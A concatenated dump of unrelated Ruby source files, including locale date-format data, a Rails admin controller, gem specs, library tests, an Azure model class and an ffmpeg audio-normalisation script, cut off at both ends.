@era_abbrs[:japanese]["211"] = "Kyōhō"
@era_abbrs[:japanese]["212"] = "Genbun"
@era_abbrs[:japanese]["213"] = "Kanpō"
@era_abbrs[:japanese]["214"] = "Enkyō"
@era_abbrs[:japanese]["215"] = "Kan-en"
@era_abbrs[:japanese]["216"] = "Hōryaku"
@era_abbrs[:japanese]["217"] = "Meiwa"
@era_abbrs[:japanese]["218"] = "An-ei"
@era_abbrs[:japanese]["219"] = "Tenmei"
@era_abbrs[:japanese]["22"] = "Shōwa"
@era_abbrs[:japanese]["220"] = "Kansei"
@era_abbrs[:japanese]["221"] = "Kyōwa"
@era_abbrs[:japanese]["222"] = "Bunka"
@era_abbrs[:japanese]["223"] = "Bunsei"
@era_abbrs[:japanese]["224"] = "Tenpō"
@era_abbrs[:japanese]["225"] = "Kōka"
@era_abbrs[:japanese]["226"] = "Kaei"
@era_abbrs[:japanese]["227"] = "Ansei"
@era_abbrs[:japanese]["228"] = "Man-en"
@era_abbrs[:japanese]["229"] = "Bunkyū"
@era_abbrs[:japanese]["23"] = "Kajō"
@era_abbrs[:japanese]["230"] = "Genji"
@era_abbrs[:japanese]["231"] = "Keiō"
@era_abbrs[:japanese]["232"] = "Meiji"
@era_abbrs[:japanese]["233"] = "Taishō"
@era_abbrs[:japanese]["234"] = "Shōwa"
@era_abbrs[:japanese]["235"] = "Heisei"
@era_abbrs[:japanese]["24"] = "Ninju"
@era_abbrs[:japanese]["25"] = "Saiko"
@era_abbrs[:japanese]["26"] = "Tennan"
@era_abbrs[:japanese]["27"] = "Jōgan"
@era_abbrs[:japanese]["28"] = "Genkei"
@era_abbrs[:japanese]["29"] = "Ninna"
@era_abbrs[:japanese]["3"] = "Shuchō"
@era_abbrs[:japanese]["30"] = "Kampyō"
@era_abbrs[:japanese]["31"] = "Shōtai"
@era_abbrs[:japanese]["32"] = "Engi"
@era_abbrs[:japanese]["33"] = "Enchō"
@era_abbrs[:japanese]["34"] = "Shōhei"
@era_abbrs[:japanese]["35"] = "Tengyō"
@era_abbrs[:japanese]["36"] = "Tenryaku"
@era_abbrs[:japanese]["37"] = "Tentoku"
@era_abbrs[:japanese]["38"] = "Ōwa"
@era_abbrs[:japanese]["39"] = "Kōhō"
@era_abbrs[:japanese]["4"] = "Taihō"
@era_abbrs[:japanese]["40"] = "Anna"
@era_abbrs[:japanese]["41"] = "Tenroku"
@era_abbrs[:japanese]["42"] = "Ten-en"
@era_abbrs[:japanese]["43"] = "Jōgen"
@era_abbrs[:japanese]["44"] = "Tengen"
@era_abbrs[:japanese]["45"] = "Eikan"
@era_abbrs[:japanese]["46"] = "Kanna"
@era_abbrs[:japanese]["47"] = "Ei-en"
@era_abbrs[:japanese]["48"] = "Eiso"
@era_abbrs[:japanese]["49"] = "Shōryaku"
@era_abbrs[:japanese]["5"] = "Keiun"
@era_abbrs[:japanese]["50"] = "Chōtoku"
@era_abbrs[:japanese]["51"] = "Chōhō"
@era_abbrs[:japanese]["52"] = "Kankō"
@era_abbrs[:japanese]["53"] = "Chōwa"
@era_abbrs[:japanese]["54"] = "Kannin"
@era_abbrs[:japanese]["55"] = "Jian"
@era_abbrs[:japanese]["56"] = "Manju"
@era_abbrs[:japanese]["57"] = "Chōgen"
@era_abbrs[:japanese]["58"] = "Chōryaku"
@era_abbrs[:japanese]["59"] = "Chōkyū"
@era_abbrs[:japanese]["6"] = "Wadō"
@era_abbrs[:japanese]["60"] = "Kantoku"
@era_abbrs[:japanese]["61"] = "Eishō"
@era_abbrs[:japanese]["62"] = "Tengi"
@era_abbrs[:japanese]["63"] = "Kōhei"
@era_abbrs[:japanese]["64"] = "Jiryaku"
@era_abbrs[:japanese]["65"] = "Enkyū"
@era_abbrs[:japanese]["66"] = "Shōho"
@era_abbrs[:japanese]["67"] = "Shōryaku"
@era_abbrs[:japanese]["68"] = "Eiho"
@era_abbrs[:japanese]["69"] = "Ōtoku"
@era_abbrs[:japanese]["7"] = "Reiki"
@era_abbrs[:japanese]["70"] = "Kanji"
@era_abbrs[:japanese]["71"] = "Kaho"
@era_abbrs[:japanese]["72"] = "Eichō"
@era_abbrs[:japanese]["73"] = "Shōtoku"
@era_abbrs[:japanese]["74"] = "Kōwa"
@era_abbrs[:japanese]["75"] = "Chōji"
@era_abbrs[:japanese]["76"] = "Kashō"
@era_abbrs[:japanese]["77"] = "Tennin"
@era_abbrs[:japanese]["78"] = "Ten-ei"
@era_abbrs[:japanese]["79"] = "Eikyū"
@era_abbrs[:japanese]["8"] = "Yōrō"
@era_abbrs[:japanese]["80"] = "Gen-ei"
@era_abbrs[:japanese]["81"] = "Hoan"
@era_abbrs[:japanese]["82"] = "Tenji"
@era_abbrs[:japanese]["83"] = "Daiji"
@era_abbrs[:japanese]["84"] = "Tenshō"
@era_abbrs[:japanese]["85"] = "Chōshō"
@era_abbrs[:japanese]["86"] = "Hoen"
@era_abbrs[:japanese]["87"] = "Eiji"
@era_abbrs[:japanese]["88"] = "Kōji"
@era_abbrs[:japanese]["89"] = "Tenyō"
@era_abbrs[:japanese]["9"] = "Jinki"
@era_abbrs[:japanese]["90"] = "Kyūan"
@era_abbrs[:japanese]["91"] = "Ninpei"
@era_abbrs[:japanese]["92"] = "Kyūju"
@era_abbrs[:japanese]["93"] = "Hogen"
@era_abbrs[:japanese]["94"] = "Heiji"
@era_abbrs[:japanese]["95"] = "Eiryaku"
@era_abbrs[:japanese]["96"] = "Ōho"
@era_abbrs[:japanese]["97"] = "Chōkan"
@era_abbrs[:japanese]["98"] = "Eiman"
@era_abbrs[:japanese]["99"] = "Nin-an"
@era_abbrs[:persian] = {}
@era_abbrs[:persian]["0"] = "AP"
@dateformats = {}
@dateformats[:buddhist] = {}
@dateformats[:buddhist]["full"] = "EEEE, MMMM d, yyyy G"
@dateformats[:buddhist]["long"] = "MMMM d, yyyy G"
@dateformats[:buddhist]["medium"] = "MMM d, yyyy G"
@dateformats[:buddhist]["short"] = "M/d/yyyy"
@dateformats[:chinese] = {}
@dateformats[:chinese]["full"] = "EEEE y'x'G-Ml-d"
@dateformats[:chinese]["long"] = "y'x'G-Ml-d"
@dateformats[:chinese]["medium"] = "y'x'G-Ml-d"
@dateformats[:chinese]["short"] = "y'x'G-Ml-d"
@dateformats[:gregorian] = {}
@dateformats[:gregorian]["full"] = "EEEE d MMMM yyyy"
@dateformats[:gregorian]["long"] = "d MMMM yyyy"
@dateformats[:gregorian]["medium"] = "dd-MM-yyyy"
@dateformats[:gregorian]["short"] = "d-M-yy"
@dateformats[:japanese] = {}
@dateformats[:japanese]["full"] = "EEEE, MMMM d, y G"
@dateformats[:japanese]["long"] = "MMMM d, y G"
@dateformats[:japanese]["medium"] = "MMM d, y G"
@dateformats[:japanese]["short"] = "M/d/yy"
@dateformat_defaults = {}
@dateformat_defaults["buddhist"] = "medium"
@dateformat_defaults["chinese"] = "medium"
@dateformat_defaults["gregorian"] = "medium"
@dateformat_defaults["japanese"] = "medium"
@timeformats = {}
@timeformats[:buddhist] = {}
@timeformats[:buddhist]["full"] = "h:mm:ss a z"
@timeformats[:buddhist]["long"] = "h:mm:ss a z"
@timeformats[:buddhist]["medium"] = "h:mm:ss a"
@timeformats[:buddhist]["short"] = "h:mm a"
@timeformats[:chinese] = {}
@timeformats[:chinese]["full"] = "h:mm:ss a z"
@timeformats[:chinese]["long"] = "h:mm:ss a z"
@timeformats[:chinese]["medium"] = "h:mm:ss a"
@timeformats[:chinese]["short"] = "h:mm a"
@timeformats[:gregorian] = {}
@timeformats[:gregorian]["full"] = "h:mm:ss a z"
@timeformats[:gregorian]["long"] = "h:mm:ss a z"
@timeformats[:gregorian]["medium"] = "h:mm:ss a"
@timeformats[:gregorian]["short"] = "h:mm a"
@timeformats[:japanese] = {}
@timeformats[:japanese]["full"] = "h:mm:ss a z"
@timeformats[:japanese]["long"] = "h:mm:ss a z"
@timeformats[:japanese]["medium"] = "h:mm:ss a"
@timeformats[:japanese]["short"] = "h:mm a"
@timeformat_defaults = {}
@timeformat_defaults["buddhist"] = "medium"
@timeformat_defaults["chinese"] = "medium"
@timeformat_defaults["gregorian"] = "medium"
@timeformat_defaults["japanese"] = "medium"
@datetimeformats = {}
@datetimeformats["buddhist"] = "{1} {0}"
@datetimeformats["chinese"] = "{1} {0}"
@datetimeformats["gregorian"] = "{1} {0}"
@datetimeformats["japanese"] = "{1} {0}"
@fields = {}
@fields[:gregorian] = {}
@fields[:gregorian]["day"] = "Day"
@fields[:gregorian]["dayperiod"] = "Dayperiod"
@fields[:gregorian]["era"] = "Era"
@fields[:gregorian]["hour"] = "Hour"
@fields[:gregorian]["minute"] = "Minute"
@fields[:gregorian]["month"] = "Month"
@fields[:gregorian]["second"] = "Second"
@fields[:gregorian]["week"] = "Week"
@fields[:gregorian]["weekday"] = "Day of the Week"
@fields[:gregorian]["year"] = "Year"
@fields[:gregorian]["zone"] = "Zone"
@field_relatives = {}
end
public
attr_reader :localized_pattern_characters
attr_reader :default
attr_reader :months
attr_reader :monthformat_defaults
attr_reader :days
attr_reader :dayformat_defaults
attr_reader :week_firstdays
attr_reader :weekend_starts
attr_reader :weekend_ends
attr_reader :mindays
attr_reader :am
attr_reader :pm
attr_reader :era_names
attr_reader :era_abbrs
attr_reader :dateformats
attr_reader :dateformat_defaults
attr_reader :timeformats
attr_reader :timeformat_defaults
attr_reader :datetimeformats
attr_reader :fields
attr_reader :field_relatives
| 42.602837 | 67 | 0.58282 |
bf93480b089ee029b392332b6e4e7503379673be | 2,554 | class Admin::MemberStoriesController < Admin::BaseController
include NewsItemMethods
before_filter :setup
before_filter :get_news_item, :only => [:show, :update, :edit, :destroy]
cache_sweeper :member_stories_sweeper, :only => [:create, :update, :destroy]
uses_tiny_mce(:options => GlobalConfig.advanced_mce_options.merge(:language => 'tr'),
:raw_options => GlobalConfig.raw_mce_options,
:only => [:new, :create, :edit, :update])
def index
@news_items = @widget.news_items.paginate(:page => @page, :per_page => @per_page)
respond_to do |format|
format.html # index.html.erb
format.xml { render :xml => @news_items }
format.json do
root_part = admin_member_stories_path + '/'
render :json => autocomplete_urls_json(@news_items, root_part)
end
end
end
def show
render
end
def new
@news_item = @widget.news_items.build
respond_to do |format|
format.html # new.html.erb
format.xml { render :xml => @news_item }
end
end
def edit
render
end
def create
@news_item = @widget.news_items.build(params[:news_item])
saved = @news_item.save
respond_to do |format|
if saved
flash[:notice] = 'Member Story was successfully created.'
format.html { redirect_to admin_member_stories_url }
format.xml { render :xml => @news_item, :status => :created, :location => @widget }
else
format.html { render :action => "new" }
format.xml { render :xml => @news_item.errors, :status => :unprocessable_entity }
end
end
end
def update
respond_to do |format|
if @news_item.update_attributes(params[:news_item])
flash[:notice] = "Member story '#{@news_item.title}' was successfully updated."
format.html { redirect_to admin_member_stories_url }
format.xml { head :ok }
else
format.html { render :action => "edit" }
format.xml { render :xml => @news_item.errors, :status => :unprocessable_entity }
end
end
end
def destroy
@news_item.destroy
flash[:notice] = "Member story '#{@news_item.title}' was successfully deleted."
respond_to do |format|
format.html { redirect_to admin_member_stories_url }
format.xml { head :ok }
end
end
private
def setup
@widget = Widget.find_or_create_by_name(:member_stories)
end
end
| 29.697674 | 93 | 0.613939 |
6a082f81e22645f4d22dc16e13bd8f3fa5908f7d | 1,735 | # encoding: utf-8
class ImmutableStruct
VERSION = '1.1.1'
def self.new(*attrs, &block)
struct = Struct.new(*attrs, &block)
make_immutable!(struct)
optionalize_constructor!(struct)
extend_dup!(struct)
struct
end
private
def self.make_immutable!(struct)
struct.send(:undef_method, "[]=".to_sym)
struct.members.each do |member|
struct.send(:undef_method, "#{member}=".to_sym)
end
end
def self.optionalize_constructor!(struct)
struct.class_eval do
alias_method :struct_initialize, :initialize
def self.json_create(object)
new(object["members"])
end
def initialize(*attrs)
if members.size > 1 && attrs && attrs.size == 1 && attrs.first.is_a?(Hash)
hash = attrs.first
struct_initialize(*members.map { |m| hash[m] || hash[m.to_s] })
else
struct_initialize(*attrs)
end
end
def to_h
members.inject({}) do |h, m|
h[m.to_sym] = self[m]
h
end
end
def encode_with(coder)
members.each do |m|
coder[m.to_s] = self[m]
end
end
def init_with(coder)
struct_initialize(*members.map { |m| coder.map[m.to_s] })
end
def as_json
klass = self.class.name
klass.to_s.empty? and raise JSON::JSONError, "Only named structs are supported!"
{
JSON.create_id => klass,
"members" => to_h,
}
end
def to_json(*args)
as_json.to_json(*args)
end
end
end
def self.extend_dup!(struct)
struct.class_eval do
def dup(overrides={})
self.class.new(to_h.merge(overrides))
end
end
end
end
| 21.419753 | 88 | 0.575216 |
5dc1559321055b1777dbbbddfd118616510083b9 | 1,129 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'google/apis/kgsearch_v1/service.rb'
require 'google/apis/kgsearch_v1/classes.rb'
require 'google/apis/kgsearch_v1/representations.rb'
require 'google/apis/kgsearch_v1/gem_version.rb'
module Google
module Apis
# Knowledge Graph Search API
#
# Searches the Google Knowledge Graph for entities.
#
# @see https://developers.google.com/knowledge-graph/
module KgsearchV1
# Version of the Knowledge Graph Search API this client connects to.
# This is NOT the gem version.
VERSION = 'V1'
end
end
end
| 33.205882 | 74 | 0.741364 |
18a434ecbcd644aea0be78433aa6a7c258659bdd | 671 | Pod::Spec.new do |s|
s.name = "CountdownLabel"
s.version = '5.0.0'
s.summary = 'Simple countdown UILabel with morphing animation, and some useful function. update to swift 5.0+'
s.homepage = "https://github.com/suzuki-0000/CountdownLabel"
s.license = { :type => "MIT", :file => "LICENSE" }
s.author = { "suzuki_keishi" => "[email protected]" }
s.source = { :git => "https://github.com/suzuki-0000/CountdownLabel.git", :tag => s.version }
s.platform = :ios, "10"
s.source_files = 'CountdownLabel/*.swift'
s.source_files = 'CountdownLabel/**/*.swift'
s.requires_arc = true
s.frameworks = "UIKit"
end
| 44.733333 | 117 | 0.621461 |
edafa081fb1689645f6a9cb1b2a3a94fc6aceb71 | 2,687 | # encoding: utf-8
require 'helper'
class TestAddress < Test::Unit::TestCase
include DeterministicHelper
assert_methods_are_deterministic(
FFaker::Address,
:building_number, :city, :city_prefix, :city_suffix, :secondary_address,
:street_address, :street_name, :street_suffix, :neighborhood,
:country, :country_code, :time_zone
)
assert_methods_are_deterministic(
FFaker::AddressUS,
:state, :state_abbr, :zip_code
)
def test_building_number
assert_match(/\A\d{3,5}\z/, FFaker::Address.building_number)
end
def test_city
assert_match(/[ a-z]+/, FFaker::Address.city)
end
def test_city_prefix
assert_match(/[ a-z]/, FFaker::Address.city_prefix)
end
def test_city_suffix
assert_match(/[ a-z]/, FFaker::Address.city_suffix)
end
def test_secondary_address
assert_match(/[ a-z]/, FFaker::Address.secondary_address)
end
def test_street_address
assert_match(/[ a-z]/, FFaker::Address.street_address)
end
def test_street_name
assert_match(/[ a-z]/, FFaker::Address.street_name)
end
def test_street_suffix
assert_match(/[ a-z]/, FFaker::Address.street_suffix)
end
def test_uk_country
assert_match(/[ a-z]/, FFaker::AddressUK.country)
assert_deterministic { FFaker::AddressUK.country }
end
def test_uk_county
assert_match(/[ a-z]/, FFaker::AddressUK.county)
assert_deterministic { FFaker::AddressUK.county }
end
def test_uk_postcode
assert_match(/[ a-z]/, FFaker::AddressUK.postcode)
assert_deterministic { FFaker::AddressUK.postcode }
end
def test_us_state
assert_match(/[ a-z]/, FFaker::AddressUS.state)
end
def test_us_state_abbr
assert_match(/[A-Z]/, FFaker::AddressUS.state_abbr)
end
def test_zip_code
assert_match(/[0-9]/, FFaker::AddressUS.zip_code)
end
def test_zip_code_frozen
assert FFaker::AddressUS.zip_code.frozen? == false
end
def test_neighborhood
assert_match(/[ a-z]+/, FFaker::Address.neighborhood)
end
def test_country
assert_match(/[ a-z]+/, FFaker::Address.country)
end
def test_country_by_county_code
assert_match('Ukraine', FFaker::Address.country('UA'))
assert_deterministic { FFaker::Address.country('UA') }
end
def test_country_code
assert_match(/[A-Z]{2}/, FFaker::Address.country_code)
end
def test_country_code_of_particular_country
assert_match('UA', FFaker::Address.country_code('Ukraine'))
assert_match(/[A-Z]{2}/, FFaker::Address.country_code('Foo'))
assert_deterministic { FFaker::Address.country_code('Ukraine') }
end
def test_time_zone
assert_include FFaker::Address::TIME_ZONE, FFaker::Address.time_zone
end
end
| 24.427273 | 76 | 0.717529 |
876dc1fbbd42cd0c00f7a4588cc2ab04d66a5626 | 429 | require_relative "../canvas_base_input_type"
module LMSGraphQL
module Types
module Canvas
class CanvasProficiencyInput < BaseInputObject
description "Proficiency Ratings. API Docs: https://canvas.instructure.com/doc/api/proficiency_ratings.html"
argument :ratings, String, "An array of proficiency ratings. See the ProficiencyRating specification above..", required: false
end
end
end
end | 30.642857 | 132 | 0.752914 |
d51dc6be92fe77b751341fd987ab1c2d5dab6cc0 | 1,248 | # Configure Rails Environment
ENV["RAILS_ENV"] ||= 'test'
if File.exist?(dummy_path = File.expand_path('../dummy/config/environment.rb', __FILE__))
require dummy_path
elsif File.dirname(__FILE__) =~ %r{vendor/extensions}
# Require the path to the refinerycms application this is vendored inside.
require File.expand_path('../../../../../config/environment', __FILE__)
else
puts "Could not find a config/environment.rb file to require. Please specify this in #{File.expand_path(__FILE__)}"
end
require 'rspec/rails'
require 'capybara/rspec'
Rails.backtrace_cleaner.remove_silencers!
RSpec.configure do |config|
config.mock_with :rspec
config.treat_symbols_as_metadata_keys_with_true_values = true
config.filter_run :focus => true
config.run_all_when_everything_filtered = true
# fix deprecation warnings
config.infer_spec_type_from_file_location!
config.expose_current_running_example_as :example
end
# Requires supporting files with custom matchers and macros, etc,
# in ./support/ and its subdirectories including factories.
([Rails.root.to_s] | ::Refinery::Plugins.registered.pathnames).map{|p|
Dir[File.join(p, 'spec', 'support', '**', '*.rb').to_s]
}.flatten.sort.each do |support_file|
require support_file
end
| 34.666667 | 117 | 0.766026 |
e84cfbd8cf3de668c7a26de318b604d1bb35574b | 713 | require "spec_helper"
require "hamster/stack"
describe Hamster::Stack do
[:pop, :dequeue].each do |method|
describe "##{method}" do
[
[[], []],
[["A"], []],
[%w[A B], ["A"]],
[%w[A B C], %w[A B]],
].each do |values, expected|
describe "on #{values.inspect}" do
before do
@original = Hamster.stack(*values)
@result = @original.send(method)
end
it "preserves the original" do
@original.should == Hamster.stack(*values)
end
it "returns #{expected.inspect}" do
@result.should == Hamster.stack(*expected)
end
end
end
end
end
end | 23 | 54 | 0.490884 |
332d5216852e8e706c1c45f3437c9da5a26f63f4 | 1,427 | # encoding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'jekyll-pandoc-multiple-formats/version'
Gem::Specification.new do |gem|
gem.name = 'jekyll-pandoc-multiple-formats'
gem.version = JekyllPandocMultipleFormats::VERSION
gem.authors = ['Mauricio Pasquier Juan', 'Nicolás Reynolds']
gem.email = ['[email protected]', '[email protected]']
gem.description = %q{This jekyll plugin was inspired by
jekyll-pandoc-plugin but it was changed to generate multiple outputs,
rather than just using pandoc to generate jekyll html posts. Besides,
it doesn't require the 'pandoc-ruby' gem.}
gem.summary = %q{Use pandoc on jekyll to generate posts in multiple formats}
gem.homepage = 'https://github.com/fauno/jekyll-pandoc-multiple-formats'
gem.license = 'MIT'
gem.files = `git ls-files`.split($/)
gem.executables = gem.files.grep(%r{^bin/}).map{ |f| File.basename(f) }
gem.test_files = gem.files.grep(%r{^(test|spec|features)/})
gem.require_paths = ['lib']
gem.add_dependency('jekyll', '~> 3.7.0')
gem.add_dependency('pdf_info', '~> 0.5.0')
gem.add_dependency('rtex', '~> 2.1.0')
gem.add_development_dependency('rake', '~> 10.5.0')
gem.add_development_dependency('minitest', '~> 5.8.0')
gem.add_development_dependency('shoulda', '~> 3.5.0')
end
| 46.032258 | 84 | 0.683952 |
6ac741f1bad500e0668e514507d2d552d8275921 | 363 | require 'postal/config'
if Postal.config.general&.exception_url
require 'raven'
Raven.configure do |config|
config.dsn = Postal.config.general.exception_url
config.environments = ['production']
config.environments << 'development' if ENV['DEV_EXCEPTIONS']
config.silence_ready = true
config.tags = { process: ENV['PROC_NAME'] }
end
end
| 27.923077 | 65 | 0.721763 |
f7ebb6def9fd5efcc6c253425e45e15e8c458d8d | 782 | # == Schema Information
#
# Table name: summaries
#
# id :bigint not null, primary key
# content :text not null
# created_at :datetime not null
# updated_at :datetime not null
# author_id :integer not null
# feature_id :integer not null
# language_id :integer not null
#
class Summary < ActiveRecord::Base
belongs_to :feature, touch: true
belongs_to :language
belongs_to :author, :class_name => 'AuthenticatedSystem::Person'
has_many :imports, :as => 'item', :dependent => :destroy
validates :language_id, :uniqueness => {:scope => :feature_id}
validates :plain_content, length: 1..750
include KmapsEngine::IsCitable
def plain_content
content.strip_tags
end
end
| 26.965517 | 66 | 0.643223 |
914aa752ab80b5cc1524094c280f8833126bc5b7 | 961 | require 'tempfile'
require 'json'
target = ARGV[0].tr("\\","/")
temp = Tempfile.new
new_name = 'NORMALIZED_' + File.basename(target)
file_path = File.dirname(target)
output_name = file_path + '/' + new_name
ffprobe_command = "ffprobe -v quiet -print_format json -show_format -show_streams -select_streams a '" + target + "'"
ffmpeg_command = "ffmpeg -i '" + target + "' -vn -af volumedetect -f null - 2> #{temp.path}"
`#{ffmpeg_command}`
ffprobe_out = JSON.parse(`#{ffprobe_command}`)
normalization_data = File.readlines(temp).select {|line| line.include? 'max_volume'}
audio_codec = ffprobe_out['streams'][0]['codec_name']
sample_rate = ffprobe_out['streams'][0]['sample_rate']
normalization_value = (-3.0 - normalization_data[0].split(' ')[4].to_f)
puts normalization_data
puts normalization_value
puts audio_codec
puts sample_rate
# `ffmpeg -i #{target} -c:v copy -c:a #{audio_codec} -ar #{sample_rate} -af volume="#{normalization_value}dB" #{output_name}` | 43.681818 | 125 | 0.724246 |
bf840118ca8164f1d0c07a5a8263985b14740c33 | 1,235 | # frozen_string_literal: true
require "test_helper"
module Byebug
#
# Tests exception catching
#
class CatchTest < TestCase
def test_catch_adds_catchpoints
enter "catch NoMethodError"
debug_code(minimal_program)
assert_equal 1, Byebug.catchpoints.size
end
def test_catch_removes_specific_catchpoint
enter "catch NoMethodError", "catch NoMethodError off"
debug_code(minimal_program)
assert_empty Byebug.catchpoints
end
def test_catch_off_removes_all_catchpoints_after_confirmation
enter "catch NoMethodError", "catch off", "y"
debug_code(minimal_program)
assert_empty Byebug.catchpoints
end
def test_catch_without_arguments_and_no_exceptions_caught
enter "catch"
debug_code(minimal_program)
check_output_includes "No exceptions set to be caught."
end
def test_catch_without_arguments_and_exceptions_caught
enter "catch NoMethodError", "catch"
debug_code(minimal_program)
check_output_includes "NoMethodError: false"
end
def test_catch_help
enter "help catch"
debug_code(minimal_program)
check_output_includes "cat[ch][ (off|<exception>[ off])]"
end
end
end
| 23.301887 | 65 | 0.728745 |
1af3627ecb5e3dd55e265526c389835ba453b473 | 412 | module BacklogKit
class Client
# Methods for the Git API
module Git
# Get list of git repositories
#
# @param project_id_or_key [Integer, String] Project id or project key
# @return [BacklogKit::Response] List of git repositories
def get_git_repositories(project_id_or_key)
get('git/repositories', project_id_or_key: project_id_or_key)
end
end
end
end
| 27.466667 | 76 | 0.68932 |
e8e625506f020aa6a121d4ffb7d1be67fa6006c7 | 1,807 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ContainerRegistry::Mgmt::V2018_09_01
module Models
#
# Describes the credentials that will be used to access a custom registry
# during a run.
#
class CustomRegistryCredentials
include MsRestAzure
# @return [SecretObject] The username for logging into the custom
# registry.
attr_accessor :user_name
# @return [SecretObject] The password for logging into the custom
# registry. The password is a secret
# object that allows multiple ways of providing the value for it.
attr_accessor :password
#
# Mapper for CustomRegistryCredentials class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'CustomRegistryCredentials',
type: {
name: 'Composite',
class_name: 'CustomRegistryCredentials',
model_properties: {
user_name: {
client_side_validation: true,
required: false,
serialized_name: 'userName',
type: {
name: 'Composite',
class_name: 'SecretObject'
}
},
password: {
client_side_validation: true,
required: false,
serialized_name: 'password',
type: {
name: 'Composite',
class_name: 'SecretObject'
}
}
}
}
}
end
end
end
end
| 28.68254 | 77 | 0.556724 |
e2e819035b82d2df9d59ca40161a6a0febafd461 | 4,154 | # frozen_string_literal: true
require_relative "abstract_unit"
require "active_support/concern"
class ConcernTest < ActiveSupport::TestCase
module Baz
extend ActiveSupport::Concern
class_methods do
def baz
"baz"
end
def included_ran=(value)
@included_ran = value
end
def included_ran
@included_ran
end
def prepended_ran=(value)
@prepended_ran = value
end
def prepended_ran
@prepended_ran
end
end
included do
self.included_ran = true
end
prepended do
self.prepended_ran = true
end
def baz
"baz"
end
end
module Bar
extend ActiveSupport::Concern
include Baz
module ClassMethods
def baz
"bar's baz + " + super
end
end
def bar
"bar"
end
def baz
"bar+" + super
end
end
module Foo
extend ActiveSupport::Concern
include Bar, Baz
end
module Qux
module ClassMethods
end
end
def setup
@klass = Class.new
end
def test_module_is_included_normally
@klass.include(Baz)
assert_equal "baz", @klass.new.baz
assert_includes @klass.included_modules, ConcernTest::Baz
end
def test_module_is_prepended_normally
@klass.prepend(Baz)
assert_equal "baz", @klass.new.baz
assert_includes @klass.included_modules, ConcernTest::Baz
end
def test_class_methods_are_extended
@klass.include(Baz)
assert_equal "baz", @klass.baz
assert_equal ConcernTest::Baz::ClassMethods, (class << @klass; included_modules; end)[0]
end
def test_class_methods_are_extended_when_prepended
@klass.prepend(Baz)
assert_equal "baz", @klass.baz
assert_equal ConcernTest::Baz::ClassMethods, (class << @klass; included_modules; end)[0]
end
def test_class_methods_are_extended_only_on_expected_objects
::Object.include(Qux)
Object.extend(Qux::ClassMethods)
# module needs to be created after Qux is included in Object or bug won't
# be triggered
test_module = Module.new do
extend ActiveSupport::Concern
class_methods do
def test
end
end
end
@klass.include test_module
assert_not_respond_to Object, :test
Qux.class_eval do
remove_const :ClassMethods
end
end
def test_included_block_is_ran
@klass.include(Baz)
assert_equal true, @klass.included_ran
end
def test_included_block_is_not_ran_when_prepended
@klass.prepend(Baz)
assert_nil @klass.included_ran
end
def test_prepended_block_is_ran
@klass.prepend(Baz)
assert_equal true, @klass.prepended_ran
end
def test_prepended_block_is_not_ran_when_included
@klass.include(Baz)
assert_nil @klass.prepended_ran
end
def test_modules_dependencies_are_met
@klass.include(Bar)
assert_equal "bar", @klass.new.bar
assert_equal "bar+baz", @klass.new.baz
assert_equal "bar's baz + baz", @klass.baz
assert_includes @klass.included_modules, ConcernTest::Bar
end
def test_dependencies_with_multiple_modules
@klass.include(Foo)
assert_equal [ConcernTest::Foo, ConcernTest::Bar, ConcernTest::Baz], @klass.included_modules[0..2]
end
def test_dependencies_with_multiple_modules_when_prepended
@klass.prepend(Foo)
assert_equal [ConcernTest::Foo, ConcernTest::Bar, ConcernTest::Baz], @klass.included_modules[0..2]
end
def test_raise_on_multiple_included_calls
assert_raises(ActiveSupport::Concern::MultipleIncludedBlocks) do
Module.new do
extend ActiveSupport::Concern
included do
end
included do
end
end
end
end
def test_raise_on_multiple_prepended_calls
assert_raises(ActiveSupport::Concern::MultiplePrependBlocks) do
Module.new do
extend ActiveSupport::Concern
prepended do
end
prepended do
end
end
end
end
def test_no_raise_on_same_included_or_prepended_call
assert_nothing_raised do
2.times do
load File.expand_path("../fixtures/concern/some_concern.rb", __FILE__)
end
end
end
end
| 20.979798 | 102 | 0.689215 |
7a514eee3704f66bd615feb5be61136247bca5cd | 356 | cask 'manager' do
version '18.5.21'
sha256 '0be82612b7f63653e73d9a64077a112c93bf8cecf5f9989434b828a9c976f3b5'
# d2ap5zrlkavzl7.cloudfront.net was verified as official when first introduced to the cask
url "https://d2ap5zrlkavzl7.cloudfront.net/#{version}/Manager.dmg"
name 'Manager'
homepage 'https://www.manager.io/'
app 'Manager.app'
end
| 29.666667 | 92 | 0.772472 |
1de1c8d156aa8e192191cf87b6e6f213d8013b6c | 692 | # encoding: utf-8
module HarmoniousDictionary
module ModelAdditions
def validate_harmonious_of(attr_names, option = {})
configuration = {message:'不能含有敏感词'}
library = option.values[0].to_s
configuration.update(attr_names.pop) if attr_names.last.is_a?(Hash)
validates_each attr_names do |model, attribute, value|
unless value.blank?
if option.size == 0
model.errors.add(attribute, configuration[:message]) unless HarmoniousDictionary.clean?(value)
else
model.errors.add(attribute, configuration[:message]) unless HarmoniousDictionary.clean?(value, library)
end
end
end
end
end
end
| 32.952381 | 115 | 0.674855 |
0150e9d67dde3e5bbc498fbf83b412d2150231d8 | 1,831 | #
# Author:: Tyler Cloke ([email protected])
# Copyright:: Copyright 2015-2016, Chef Software, Inc
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require_relative "../knife"
require_relative "key_list_base"
class Chef
class Knife
# Implements knife user key list using Chef::Knife::KeyList
# as a service class.
#
# @author Tyler Cloke
#
# @attr_reader [String] actor the name of the client that this key is for
class ClientKeyList < Knife
include Chef::Knife::KeyListBase
